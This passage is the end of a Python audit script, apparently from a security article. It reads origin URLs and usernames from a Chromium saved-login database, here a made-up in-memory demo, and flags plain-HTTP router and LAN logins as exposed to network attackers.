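    p = urlsplit(url)
    port = p.port or (443 if p.scheme == "https" else 80)
    return f"{p.scheme}://{p.hostname}:{port}"


def looks_like_lan_host(host: str) -> bool:
    # Heuristic (this example's own): private IPs, single-label names and
    # .local/.lan/.home names are the usual router management hosts.
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return "." not in host or host.endswith((".local", ".lan", ".home"))


def audit_rows(rows):
    """rows: (origin_url, username_value) tuples. Every http:// entry is a finding,
    since an attacker controlling the network can serve that origin; LAN hosts are
    rated high because they are predictable and are exactly what the attack targets."""
    findings = []
    for url, username in rows:
        p = urlsplit(url)
        if p.scheme != "http":
            continue
        risk = "high" if looks_like_lan_host(p.hostname or "") else "medium"
        findings.append({"origin": origin_of(url), "username": username, "risk": risk})
    return findings


def audit_login_db(conn: sqlite3.Connection):
    # For a real profile, copy the 'Login Data' file first: Chromium locks it while running.
    rows = conn.execute("SELECT origin_url, username_value FROM logins").fetchall()
    return audit_rows(rows)


def build_demo_db() -> sqlite3.Connection:
    # Constructed: minimal subset of Chromium's logins schema with four made-up entries.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE logins (origin_url TEXT, signon_realm TEXT, "
        "username_value TEXT, password_value BLOB)"
    )
    demo = [
        ("http://192.168.1.1/login.cgi", "http://192.168.1.1/", "admin", b""),
        ("https://accounts.example.com/signin", "https://accounts.example.com/", "me@example.com", b""),
        ("http://routerlogin.net/", "http://routerlogin.net/", "admin", b""),
        ("http://192.168.0.1:8080/", "http://192.168.0.1:8080/", "admin", b""),
    ]
    conn.executemany("INSERT INTO logins VALUES (?, ?, ?, ?)", demo)
    return conn


if __name__ == "__main__":
    for f in audit_login_db(build_demo_db()):
        print(f"{f['risk']:6} {f['origin']}  user={f['username']}")
```

Against the demo store the HTTPS entry is skipped and the three HTTP entries are reported, the two private-IP router logins as high and the vendor hostname as medium; each reported entry is one that should be deleted and re-entered only in a separate or private browser session, as the mitigations above recommend.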